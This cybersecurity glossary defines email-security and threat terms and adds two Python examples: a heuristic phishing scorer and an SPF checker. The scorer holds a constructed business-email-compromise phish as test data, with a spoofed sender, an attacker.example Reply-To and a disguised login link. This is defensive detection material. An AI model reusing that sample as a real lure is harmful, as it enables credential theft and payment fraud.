Email filtering refers to the classification of both inbound and outbound email traffic based on certain criteria. Email filtering analyzes email content for potential spam or phishing risks, and ensures those emails are properly classified and placed in the appropriate folders, such as spam or junk. Email filtering ensures malicious emails don’t end up in an individual’s main inbox, which in turn lowers the likelihood of a successful cyberattack.

Email gateway

Email gateways, or secure email gateways (SEGs), are used to detect and block malicious email content before it reaches a corporate email server. While mailbox-level email filtering sorts messages after the mail server has accepted them, email gateways sit in the delivery path and stop possible phishing attacks from reaching the mail server in the first place.

Secure email gateways rely largely on signature and reputation-based detection to protect against known email threats. While once regarded as a safe defense against cybercriminals, secure email gateways are vulnerable to many modern threats, including those that are not yet known. They also require MX record changes, which attackers can read with a simple MX lookup, revealing which gateway product is in use and, if the mail server also accepts direct connections, offering a way to bypass the gateway entirely. In the event a malicious email bypasses the gateway, SEGs also can't remediate or remove the threat post-delivery.

A superior alternative to email gateways are cybersecurity solutions that offer predictive defense against known and unknown threats. These solutions rely on artificial intelligence (AI) to conduct behavioral and heuristic analyses of emails, detect anomalies and abusive patterns, and remediate email threats post-delivery.

Email scams

Email scams such as phishing, spear phishing, and malware attacks deceive recipients with malicious intent. Email scams are designed to defraud an individual or organization by making them believe the information or request contained in the email is legitimate. These scams attempt to coerce potential victims into divulging sensitive information, completing a compromising request (e.g., transferring funds to a fraudulent account), or downloading a file infected with malware. Email scams are the most common type of cyber threat and the leading cause of initial compromise. Protecting against email-based attacks requires advanced email security.

Email security

Email security refers to the standards, best practices, and technologies used to protect personal and corporate email accounts and communications.

Email spoofing

Email spoofing is a technique used in phishing and spear phishing attempts in which a person attempts to pass off a fraudulent email as a legitimate one that closely resembles a message an individual would typically receive.

Emotet

Emotet, or Emotet malware, is a type of malware that was originally designed to steal financial data as a banking trojan. It later evolved into a modular loader and botnet that targets all types of organizations and is rented out to deliver other malware, including ransomware. After evading anti-virus detection and infiltrating a user's device or network, Emotet harvests the victim's contacts and email and sends itself on in spam that replies to genuine conversations.

Typically, Emotet arrives as a phishing email carrying a link or a document attachment that appears authentic. When the user clicks the link or enables macros in the document, a loader downloads and installs Emotet on the device. Once Emotet is installed, a user can experience data theft, loss of access to sensitive data, and critical damage to their company's IT infrastructure as a whole.

Designed to evade detection, Emotet malware is difficult to prevent. Only through the right combination of AI-based cybersecurity measures, such as anti-phishing and anti-malware solutions, macro restrictions, and user awareness training, can your organization avoid a successful Emotet attack.

Encryption

Encryption is the process of converting data from its original form, known as plaintext, into an encoded form, known as ciphertext, that is unreadable to anyone who does not hold the correct key. Organizations use encryption to protect data so that only authorized individuals, those holding the key, can convert the ciphertext back into plaintext and read the sensitive information.

The two main types of encryption are symmetric and asymmetric. Symmetric encryption uses a single secret key for both encryption and decryption, so that key must be shared securely between the parties. Asymmetric (public-key) encryption uses a key pair: a public key that anyone can use to encrypt, and a matching private key, kept secret by its owner, that decrypts; the same pair, used the other way round, produces and verifies digital signatures. In practice the two are combined, with asymmetric cryptography used to establish a symmetric key that then protects the bulk of the data.

Encryption is a vital component of cybersecurity, as it keeps sensitive information out of the hands of individuals who either don't need access to it or plan to expose it. Used both to protect a user's privacy and to secure an organization's sensitive information, encryption is an effective way of preventing others from obtaining confidential information, provided the keys themselves are protected.

Endpoint security

Endpoint security protects networks from cyberattacks by securing all network entry-points (e.g. laptops, cellphones, etc.). Endpoint security has become increasingly important with the adoption of remote and hybrid work, since there are no longer traditional security perimeters in place. Endpoint security also protects against email-borne threats through incident response and scanning.

General Data Protection Regulation (GDPR)

GDPR, short for General Data Protection Regulation, is the European Union's data protection law, establishing rules for the handling of personal data of people in the EU regardless of where the organization processing it is based. Adopted in 2016 and enforced from May 2018, GDPR aims to ensure individuals have control over their personal data, and holds organizations accountable for how they collect and process personal information.

For companies that collect, process, or store personal data, adhering to GDPR standards is vitally important and should be kept top of mind. Penalties for companies that do not adhere to GDPR guidelines include fines of up to €20 million or 4% of worldwide annual turnover for the preceding financial year, whichever is higher.

Graymail

Graymail refers to email that an individual opted in to receive at one point but no longer wants. These emails come from legitimate sources and usually carry newsletters, promotions, or educational content meant to keep the subscriber up to date on the sender's business. While graymail doesn't inflict the same harm as a cyberattack, it clutters the inbox over time and makes it harder to spot the emails that are actually malicious, which is also why attackers like to dress phishing up as routine marketing mail.

Heuristic analysis

Heuristic analysis of email uses rules and algorithms to recognize patterns typical of malicious messages, attachments, or webpages, rather than matching exact fingerprints. Each rule captures a practical indicator (urgent payment language, a Reply-To that differs from the From domain, a link whose visible text names a different site than its target) and contributes to an overall score, and the rule set is continually tuned. While signature-based protection relies on the characteristics of already-known threats, heuristic analysis can flag new ones based on behavior. To stay effective, new heuristic rules need to be created regularly to keep pace with the latest threats, and their weights adjusted to keep false positives down.
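
The scorer below is an added example, not code from this glossary or its publisher. It serves both this entry and the display name spoofing entry earlier on the page: the first rule is the display name versus sender address consistency check described there, and the remaining rules are the kind of indicators a heuristic engine weights and sums. The directory of known senders, the rule weights, and the two sample messages are constructed for the example; the message is assumed to be single-part.

```python
"""Heuristic scoring of an email message."""
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

DIRECTORY = {"jane doe": "jane.doe@example.com"}   # constructed: display name -> real address
URGENCY = ("urgent", "immediately", "wire", "gift card", "verify your account", "suspended")
WEIGHTS = {"display_name_mismatch": 40, "reply_to_domain_differs": 20,
           "urgency_language": 10, "link_text_href_mismatch": 30}


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs from <a> tags."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(text):
    """Hostname of a URL, or of bare text like 'portal.example.com'."""
    url = text if "://" in text else "http://" + text
    return (urlparse(url).hostname or "").lower()


def domain_of(address):
    return address.rsplit("@", 1)[-1].lower()


def score_message(raw):
    msg = message_from_string(raw)
    findings = []
    name, addr = parseaddr(msg.get("From", ""))
    expected = DIRECTORY.get(name.strip().lower())
    if expected and expected != addr.lower():            # known name, wrong address
        findings.append("display_name_mismatch")
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if reply_to and domain_of(reply_to) != domain_of(addr):
        findings.append("reply_to_domain_differs")
    body = msg.get_payload()                             # assumption: single-part message
    text = (msg.get("Subject", "") + "\n" + body).lower()
    findings.extend("urgency_language" for w in URGENCY if w in text)
    collector = LinkCollector()
    collector.feed(body)
    if any(href and "." in label and host_of(label) and host_of(label) != host_of(href)
           for href, label in collector.links):
        findings.append("link_text_href_mismatch")
    score = min(100, sum(WEIGHTS[f] for f in findings))
    verdict = "phishing" if score >= 50 else "suspicious" if score >= 25 else "clean"
    return {"score": score, "verdict": verdict, "findings": sorted(set(findings))}


# Constructed samples: a BEC-style phish and a benign note from the same colleague.
SAMPLE_PHISH = """\
From: Jane Doe <jane.doe@mail-example-secure.com>
Reply-To: payments@attacker.example
To: bob@example.com
Subject: Urgent wire request
Content-Type: text/html

<p>Please wire the funds immediately via <a href="http://attacker.example/login">https://portal.example.com</a></p>
"""

SAMPLE_CLEAN = """\
From: Jane Doe <jane.doe@example.com>
To: bob@example.com
Subject: Lunch tomorrow?
Content-Type: text/html

<p>Are you free at noon? The menu is at <a href="https://cafe.example">cafe.example</a></p>
"""

if __name__ == "__main__":
    print(score_message(SAMPLE_PHISH))
    print(score_message(SAMPLE_CLEAN))
```

Each rule on its own is weak evidence (a genuine invoice reminder also says "urgent"), which is why the weights are summed and why the display name rule, the strongest signal here, still does not reach the phishing threshold by itself.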

Honeypot

A honeypot is a cybersecurity tool used to trick cybercriminals into believing that they’ve gained access to an organization’s actual IT infrastructure. A honeypot is a recreation of an organization’s actual systems or networks that acts as a decoy for cybercriminals and is used to attract cyberattacks.

Honeypots can be helpful in keeping cybercriminals’ attention away from your actual assets, in addition to providing insightful information into the effectiveness and security of your legitimate IT infrastructure. Setting up a honeypot can help you glean information on the way cybercriminals operate, as well as provide you with details on where there might be gaps in your current cybersecurity measures.

Identity and Access Management (IAM)

Identity and Access Management (IAM) is a system of processes and technologies that enables organizations to securely manage the digital identities of their users. This includes controlling their access to systems, applications, and data. IAM solutions provide organizations with the ability to authorize and authenticate users and to audit and control user activities.

Incident response

Incident response is how an organization responds to a successful cyberattack or breach. This includes minimizing the negative impact, addressing the root causes, and preventing further damage and cyberattacks in the future. Incident response works to limit both the tangible repercussions of a cyberattack, such as costs and time, as well as minimize damage to elements like brand reputation and consumer trust.

Insider threat

An insider threat is typically a current or former employee who has the access needed to damage the organization's internal systems or leak sensitive information, whether through malice, negligence, or because their account has been taken over. Insider threats can also be current or former contractors, vendors, or partners who are able to access the organization's sensitive data. Effective controls include least-privilege access, monitoring of unusual data access or transfer, and an offboarding process that promptly revokes the credentials and system access of anyone who no longer requires them.

Keylogger

A keylogger, or keystroke logger, is a tool used by cybercriminals to record a user's computer activity in order to capture sensitive information. A form of spyware, keyloggers record every keystroke made by a user, and many also capture screenshots and clipboard contents. Cybercriminals use keyloggers to steal user credentials, record sensitive information such as credit card numbers, track online browsing activity, and more. Keyloggers can be difficult to detect, but with effective user awareness training, multi-factor authentication (which limits what a captured password is worth), and endpoint security in place, your organization can minimize the likelihood of keyloggers exploiting your users.

Machine Learning

Machine Learning is a subset of Artificial Intelligence (AI) that enables machines to learn from data and make decisions without being explicitly programmed for each case. Machine Learning algorithms learn to make observations, classify information, and uncover patterns. Over time, the insights gleaned from this process help algorithms become increasingly proficient at their respective tasks. Many email security products rely on Machine Learning to perform real-time analysis of emails and protect against phishing attempts, with the caveat that attackers also probe and adapt to the models.

Mail-focused security orchestration, automation, and response (M-SOAR)

Mail-focused security orchestration, automation, and response (M-SOAR) is a subset of SOAR specifically for email. M-SOAR technology enables organizations to automate their incident response and streamline the workflow for triaging and remediating threats. M-SOAR relies on a combination of AI and human input to identify email threat intelligence and respond quickly to phishing, spear phishing, and malware attacks.

Malicious email attachments

Malicious email attachments contain hidden malware or viruses in an attempt to gain access to the recipient’s system and exploit it. Cybercriminals use convincing email content to deceive the reader into opening the attachment, which often contains malware or phishing links. The best line of defense against malicious email attachments is advanced email security with automatic and assisted remediation and the ability for admins to inspect malicious attachments without risk of exposure.

Malvertising

Malvertising is the malicious use of online advertising to spread malware or phishing links, with the intent of infecting a user's computer with malware or stealing personal data. Malvertising can exploit users even when they don’t click the ad, resulting in drive-by downloads, redirects to malicious websites, and more.

Malware

Malware, short for malicious software, is any firmware or software that’s designed to infect or steal information from one or multiple computer systems.

Man-in-the-browser (MiTB) attack

Like man-in-the-middle (MiTM) attacks, man-in-the-browser (MiTB) attacks focus on intercepting calls between an executable application (EXE) and its libraries (DLL). MiTB deploys a Trojan horse to capture and manipulate calls made from the browser to its security mechanisms. Most commonly, MiTB attacks are used to facilitate financial fraud and modify transactions without alerting the user.

Man-in-the-middle attack (MitM)

A man-in-the-middle attack (MitM) is when someone intercepts sensitive information or data, either by eavesdropping on a conversation or data transfer between two parties or by impersonating one of the parties. A person carrying out a MitM attack may be undetectable to the legitimate participants, which enables them to obtain sensitive information or pass on malicious links without triggering any red flags.

Managed security service provider (MSSP)

A managed security service provider (MSSP) is a type of managed service provider specializing in cybersecurity. MSSPs manage and monitor all facets of cybersecurity for organizations, replacing the need to manage network security in-house.

Managed service provider (MSP)

Managed service providers (MSPs) are third-party organizations hired by companies to manage one or more of their IT functions. MSPs offer a range of services, including IT consulting, cloud services, remote monitoring and management of information systems, and security services. Managed security is one of the fastest growing service areas for MSPs, as cyberattacks on businesses continue to sharply rise.

Message transfer agent (MTA)

A message transfer agent (MTA) is software that is responsible for delivering email from the sender’s device to the recipient’s. MTAs deal with the complexities of deliverability at scale, including scheduling, queuing, bouncing, and more. In the past, MTAs were mainly managed by third-party vendors, but newer, customizable MTAs give service providers complete control over the process and eliminate the need to outsource them.

MFA bypass

MFA bypass is a security vulnerability that allows an attacker to bypass multi-factor authentication (MFA) and gain access to a user's account or device without needing the second or subsequent factor of authentication.

Multi-factor authentication (MFA)

Multi-factor authentication (MFA) is a security measure that uses at least two different login methods to verify a person’s identity. As opposed to logging in via username and password, MFA uses tools such as security questions, unique codes sent to phones or email addresses, or fingerprint technology to further secure an individual’s account. MFA helps organizations protect individual corporate accounts and defend against unauthorized access, data breaches, and more.

MX record

A mail exchange (MX) record exists within your DNS (Domain Name System) and is responsible for the delivery of emails to your email server. The MX record establishes which mail server to route emails to on behalf of a domain. MX records are a notable weak point of traditional email security solutions. Secure email gateways (SEGs) require you to update your MX records to point at the SEG. Because MX records are publicly visible, this reveals to cybercriminals which email security product you are using, making you more vulnerable to a targeted bypass attempt.

Natural Language Processing

Natural Language Processing (NLP) is a field of computer science that uses Machine Learning to teach computers to process and understand human language. Natural Language Processing analyzes text and is used in cybersecurity to detect threats. NLP algorithms can identify the urgent language used in social engineering attempts, as well as the flag words and phrasing typically used in spear-phishing attacks, also known as business email compromise (BEC).

Network Vector Rendering (NVR)

Network vector rendering (NVR) is a type of remote browser isolation (RBI) that leverages Skia, the graphics library that works across many browsers, hardware, and software platforms. Unlike pixel pushing or DOM reconstruction, NVR streams Skia drawing commands, rather than website code, to the user’s local device. While less costly than some pixel pushing solutions, NVR still leaves some risk of exposure to cyberthreats because it provides only partial web isolation.

On-path browser attack

Also known as a man-in-the-browser (MiTB) attack, an on-path browser attack deploys a Trojan horse to capture and manipulate calls made from the browser to its security mechanisms. MiTB attacks most commonly facilitate financial fraud without alerting the user to the nefarious activity.

Patch management

Patch management is an essential part of any cybersecurity strategy and involves running regularly scheduled system updates, or patches, to address vulnerabilities or new cybersecurity threats. Automated patch management software streamlines this process by updating software on a regular cadence to reduce downtime and ensure organizations have the most up-to-date protection available.

Personally identifiable information (PII)

Personally identifiable information, or PII, is information that can be used to identify an individual. PII can include direct identifiers, such as passport information, driver’s license information, or birth certificates, or it can be made up of a variety of indirect identifiers, such as race, occupation, and location. In the wake of increasing cyberattacks that have jeopardized countless individuals’ sensitive information, measures have been put in place to ensure PII is being safely protected and secured in order to keep identities confidential and secure.

Petya

Petya is a type of ransomware that spreads through phishing emails and infects the master boot record of Microsoft Windows-based devices. When a user clicks a malicious link that delivers Petya, the ransomware overwrites the master boot record in order to encrypt the user’s hard drive. Once the drive is encrypted, the user must enter a decryption key, typically obtained by paying a ransom, in order to retrieve their data. After Petya first emerged in 2016, a new variant called NotPetya surfaced and made headlines for crippling business operations worldwide. Unlike the original form of the virus, NotPetya uses several propagation techniques to spread quickly within and across networks. To protect your organization against Petya and its variants, it’s important to educate your employees on phishing email detection to avoid potential compromise.

Pharming

Pharming is a type of cyberattack that redirects users away from a trusted website to a fraudulent one. Through malicious code already embedded on a user’s device, pharming pushes website traffic towards fake sites, where users provide sensitive information for cybercriminals to harvest.

Similar to phishing attacks, a pharming cyberattack relies on a user not knowing that they’ve been redirected to an illegitimate site, so that they freely provide personally identifiable information (PII) or login credentials without realizing anything is wrong. As is the case with many cyberattacks, pharming prevention starts with familiarizing your employees with suspicious-looking emails and websites so that they can detect pharming attempts before handing over sensitive information.

Phishing

Phishing is the most common form of social engineering carried out by email. Unlike cyberattacks on systems and software, it requires little to no hacking expertise, making it a quick and easy way for cybercriminals to get access to a business’s most sensitive data.

Phishing awareness training

Phishing awareness training educates employees on how to detect, prevent, and report phishing attempts in order to protect themselves and their organization. Through computer-based training, simulated phishing exercises, and classroom-style training, phishing awareness training sheds light on how cybercriminals operate and ensures that when employees are faced with a real phishing attempt, they’re able to detect it before any harm is done. Phishing awareness training is crucial for organizations that need their employees to know the telltale signs of a phishing attempt, and it should be carried out on a regular basis.

Ransomware

As its name suggests, ransomware is a type of malware that blocks a user’s access to company files until a ransom is paid.

Cybersecurity remediation

Cybersecurity remediation refers to your organization’s ability to quickly and effectively address cyberattacks after they’ve occurred. Whether it’s remedying a data breach, malware attack, or security lapse, cybersecurity remediation seeks to detect and neutralize attacks before they inflict more harm. This is important to ensure that cyberattacks don’t cause further damage to your IT infrastructure after they occur. Successful cybersecurity remediation relies on continuous visibility of your systems, networks, and devices, as well as the proper upkeep of software and hardware to ensure they’re equipped with the latest security patches.

Remote access Trojan (RAT)

A remote access Trojan, or RAT, is a type of malware that enables a cybercriminal to take full control of a user’s device remotely in order to carry out a variety of malicious actions. Typically downloaded as seemingly innocuous files or programs, RATs have become increasingly difficult to detect and remove from a user’s device. Once a RAT attack has been carried out, the cybercriminal can access sensitive data, make payments, delete files, and more.

Sandbox security

Sandbox security is a form of cybersecurity that uses an isolated environment (sandbox) to analyze a potential threat for malicious behavior. The sandbox, which mimics an actual operating environment, safely executes the suspicious code without risk to the true network. Unlike signature- or reputation-based solutions, sandbox security protects against unknown threats, not only those with a recognized fingerprint or blacklisted IP address. Despite this additional layer of protection, sandbox security presents limitations. For instance, phishing emails may deliver sophisticated, environmentally aware malware, which can detect sandboxes, go dormant when analyzed, and execute malicious code upon reaching the target environment.

Secure email gateway (SEG)

A secure email gateway (SEG) is an email security solution designed to block malicious emails from entering an organization’s email server. SEGs inspect incoming and outgoing email using a gateway that sits outside the organization’s internal server. SEGs use reputation- and signature-based scanning to filter potentially malicious emails. Because the majority of cyberthreats are unknown to reputation- or signature-based detection methods, SEGs are limited in their ability to detect threats, and they provide no protection against insider attacks.

Security awareness training

Security awareness training educates employees on how to prevent and mitigate cyberattacks.

Security Information and Event Management (SIEM)

Security Information and Event Management, also known as SIEM, is a collection of technologies and services designed to improve the security of an organization’s IT infrastructure. Using SIEM tools, organizations can better track, manage, and analyze security threats while ensuring compliance across their systems and networks. Common functionalities of SIEM tools include:

  • Log collection of all activities within an infrastructure
  • Real-time analysis of security events
  • Incident management
  • Centralized dashboard for security monitoring

With the right combination of SIEM tools, organizations can consolidate large amounts of security-related information and analyze it quickly and efficiently. This in turn enables them to proactively monitor security threats and neutralize them before any harm is done.

Sender Policy Framework (SPF)

Sender Policy Framework (SPF) is used to authenticate email senders and weed out unauthorized parties attempting to send emails on behalf of your domain. SPF is an effective email-authentication method that enables an organization to permit only authorized mail servers to send email for its domain. This gives recipients confidence that a message really comes from a trustworthy source.
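To make the "only authorized mail servers" idea concrete, here is an added Python example (not part of this glossary or any vendor's product) that evaluates a sending IP against a published SPF record. The domains and records below are constructed for the demonstration, and `include:` is resolved against that constructed table rather than live DNS, so it runs offline.

```python
import ipaddress

# Constructed sample "DNS" data for the example: domain -> SPF TXT record.
# These are documentation addresses and not real mail servers.
SPF_RECORDS = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:mail.example.net -all",
    "mail.example.net": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 ~all",
}

QUALIFIER_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def evaluate_spf(domain, sender_ip, records=SPF_RECORDS, depth=0):
    """Return the SPF result ('pass', 'fail', 'softfail', 'neutral',
    'none' or 'permerror') for a message claiming to come from `domain`
    but actually sent from `sender_ip`.

    Only the ip4, ip6, include and all mechanisms are implemented; a full
    checker would also resolve a, mx, exists and redirect via DNS.
    """
    if depth > 10:                     # RFC 7208 caps DNS-querying terms
        return "permerror"
    record = records.get(domain)
    if record is None or not record.startswith("v=spf1"):
        return "none"                  # domain publishes no SPF policy
    ip = ipaddress.ip_address(sender_ip)

    for term in record.split()[1:]:    # skip the "v=spf1" version tag
        qualifier = "+"                # mechanisms default to "+" (pass)
        if term[0] in QUALIFIER_RESULT:
            qualifier, term = term[0], term[1:]
        result = QUALIFIER_RESULT[qualifier]
        name, _, arg = term.partition(":")

        if name == "all":              # "all" always matches
            return result
        if name in ("ip4", "ip6"):
            try:
                net = ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror"     # malformed record
            if ip.version == net.version and ip in net:
                return result
        elif name == "include":
            # include matches only when the included domain's policy passes
            if evaluate_spf(arg, sender_ip, records, depth + 1) == "pass":
                return result
    return "neutral"                   # no mechanism matched, no "all"


if __name__ == "__main__":
    for ip in ("192.0.2.77", "198.51.100.10", "2001:db8::1", "203.0.113.5"):
        print(f"example.com from {ip}: {evaluate_spf('example.com', ip)}")
```

A receiving server would apply the `fail`/`softfail` result in its own policy (reject, quarantine, or feed into DMARC), which is where the authentication decision actually takes effect.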

Sendmail

Sendmail is a server application that enables organizations to send email using the simple mail transfer protocol (SMTP). Sendmail facilitates the transfer of outgoing email messages from the sender to the recipient, including authenticating messages and also queuing them in the event the recipient is not available immediately. Sendmail is often combined with other email applications that enable email users to receive messages, since sendmail can’t perform this function.

Shadow IT

Shadow IT is the use of information technology systems, devices, software, applications, and services without approval of the IT department. Shadow IT has become increasingly common and problematic for organizations in recent years, with cloud computing making it easier for users to engage in this practice. Shadow IT presents significant cybersecurity risks, including compromised devices, data breaches, regulatory violations, and more.

Simple mail transfer protocol (SMTP)

Simple mail transfer protocol (SMTP) enables the transmission of emails from one server to another, allowing emails to be sent and received. SMTP is the protocol used by most major email providers and clients (Google, Yahoo, Apple Mail, etc.) and is the de facto networking standard for email. SMTP does not have any native security features, so it’s susceptible to attacks if not paired with the right email security tools.

Smishing

Smishing is a form of phishing that uses text messaging to launch a malicious attack. Hackers impersonate a brand and send victims a text message to induce them to tap a malicious link or divulge personal information such as social security numbers or credit card information. The rise of smishing follows the growth of smartphones and popularity of texting as a form of communication. Defense against smishing attacks starts with user awareness training.

Social media threats

Social media threats are attacks carried out by cybercriminals in order to compromise an individual’s personal information. Given the widespread use and popularity of social media in today’s world, these platforms are effective vehicles for social engineering attacks. Cybercriminals will often impersonate a well-established brand or person to trick individuals into handing over sensitive data. This can lay the foundation for a larger phishing, social engineering, or malicious attack. For organizations, it’s important to educate employees on the prevalence of social media threats to ensure their online activities don’t pose a cybersecurity risk to themselves or the company.

Spam email

Spam email is unsolicited and often unwanted messages sent via email to an individual. Spam emails are typically sent out to a mass audience via botnets. While often non-malicious, spam emails can contain malware or ransomware that triggers when an individual engages with the email content. However, spam email is usually distributed for email marketing purposes. An anti-spam engine can help organizations automatically detect and block spam emails.

Spear phishing

A form of social engineering, spear phishing is a malicious email that impersonates an individual for the purpose of tricking a recipient into completing a desired action—typically financial in nature. Often, a hacker will impersonate a victim’s acquaintances, such as colleagues, executives, clients, or vendors.

Supply chain security

Supply chain security is an essential component of supply chain management that works to mitigate threats, both in the real world and in cyberspace. Supply chain attacks have risen in recent years, and occur when a hacker infiltrates your IT infrastructure to access sensitive information. Properly securing your supply chain from cyberthreats is imperative in order to keep sensitive data secure, as well as avoid financial losses and delivery inefficiencies.

Supply chain security minimizes the likelihood of cybercriminals taking over your network. The SolarWinds breach that occurred in December 2020 should be looked at as a cautionary tale for organizations that handle large volumes of data. The attack impacted 18,000 government and private networks and compromised multiple supply chain layers. For those that provide software or hardware to their clients, implementing effective supply chain security solutions is a must in today’s world.

Threat intelligence

Threat intelligence is the collection of data and best practices used to understand the motives, behaviors, and tactics of cybercriminals. While no one wants to fall victim to a cyberattack, the information gleaned from a nefarious attempt can be used to prevent future threats through threat intelligence. Collecting, processing, and analyzing data regarding cyberattacks enables your organization to respond more quickly and effectively to threats in the future, and ensures data-driven decisions are being made to inform cybersecurity measures and best practices.

URL analysis

A URL analysis examines web addresses for validity using key indicators like IP information, proxy checks, and sandboxing. Conducting a URL analysis of emails is an important line of defense against cybersecurity threats. Best-in-class email security systems conduct URL analysis in real time, following URL redirects and other obfuscation techniques.

Vishing

Vishing is a form of phishing that uses phone calls as the attack vector. During a vishing attack, scammers call the victim and pose as representatives from an organization, often a financial or government institution. Scammers then use social engineering tactics to get victims to take action over the phone, such as divulging account credentials or financial information. User awareness training about how to spot and respond to a vishing attempt is an effective form of defense.

VPN

A virtual private network (VPN) is technology used to extend the protections of a private network across a public network, in order to safely send and receive data. A VPN establishes a secure, encrypted connection between a user’s computer and the internet. The shift to remote work has led to an increase in the number of organizations using VPNs to provide employees with secure access to internal networks. This has also led to an increase in cybercrime involving VPNs, with hackers targeting vulnerabilities to launch ransomware and other malicious attacks.

WannaCry ransomware

WannaCry is a type of ransomware worm that can quickly infect many devices and encrypt sensitive information. After critical files have been encrypted, cybercriminals demand a ransom to decrypt the compromised data. WannaCry came onto the scene in 2017, when computers all over the world running Windows were compromised via network vulnerabilities and users were asked to make ransom payments in the Bitcoin cryptocurrency. WannaCry can spread incredibly fast, making it a major threat to organizations that have potential security gaps in their IT infrastructure.

Web proxy server

A web proxy server is a system or router that acts as an intermediary between users and the internet. A web proxy server provides a layer of security that helps prevent cybercriminals from entering a private network. Organizations use proxy servers for a variety of reasons, including controlling what websites employees can access, changing IP addresses and hiding end-user Internet activity from third parties, and improving network performance while saving bandwidth. While web proxy servers help protect against cyberthreats like malware, they still present vulnerabilities. That’s why web proxy servers are most effectively used in combination with other cybersecurity solutions, such as email security.

Whaling

Whaling is a type of phishing attack in which threat actors target senior executives by posing as a legitimate business or partner. In this type of attack, hackers commonly target C-level executives to initiate a wire transfer or obtain sensitive information. Hackers exploit victims by sending emails that contain phishing links or malicious attachments. Whaling is often highly targeted and uses personal information about the intended victim to tailor attacks, making them more effective than traditional phishing campaigns.

Extended Detection and Response (XDR)

XDR (Extended Detection and Response) is a cross-layered cybersecurity tool used by organizations to enhance the security posture of their entire infrastructure. With greater oversight and visibility of data across a multitude of sources, XDR enables organizations to identify and respond to cybersecurity threats in a more streamlined fashion. XDR makes it possible to achieve a bird’s-eye view of your cybersecurity posture while lessening the manual burden placed on cybersecurity personnel. An effective XDR strategy enhances the detection and response capabilities of your organization, which is crucial in order to minimize security gaps between your cybersecurity solutions.

Zero-day exploit

A zero-day exploit is a method used by hackers to perform a cyberattack through a security vulnerability. Zero-day exploits take advantage of vulnerabilities that are newly patched or still undisclosed to steal sensitive information or damage computer systems. These types of exploits require prompt remediation, since you essentially have “zero days” to patch the exposed security vulnerabilities.

Zero trust

A zero trust security model is predicated on the idea that networks need to be protected from both external and internal threats. While historically, organizations have put most of their cybersecurity efforts into thwarting attacks from individuals outside the company, the zero trust model proposes that effective cybersecurity means verifying and authenticating all individuals that interact with sensitive information.

Insider threats have steadily increased in recent years, which is why many organizations now continuously monitor access privileges and ensure users have access only to the systems they need. Maintaining strict access controls helps improve the security posture of your organization and protects against all threats, whether they originate inside or outside your perimeter.